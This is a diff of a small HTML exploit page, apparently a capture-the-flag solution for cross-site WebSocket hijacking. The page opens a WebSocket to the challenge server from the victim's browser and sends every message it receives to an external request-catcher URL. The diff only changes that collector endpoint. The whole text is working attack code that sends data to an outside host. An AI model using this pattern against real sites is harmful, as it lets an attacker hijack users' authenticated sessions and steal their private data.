--- a/static/cswh.html
+++ b/static/cswh.html
@@ -10,7 +10,7 @@
         const socket = new WebSocket('wss://wembsoncket.chal.cyberjousting.com');
         socket.onopen = send_message;
         socket.addEventListener('message', ev => {
-            fetch('https://webhook.site/36aaca44-58a0-413b-86a1-cdcf17ca4c1d', { method: 'POST', mode: 'no-cors', body: ev.data });
+            fetch('https://randomname1337pleasedont.requestcatcher.com/', { method: 'POST', mode: 'no-cors', body: ev.data });
         });
     </script>
 </head>
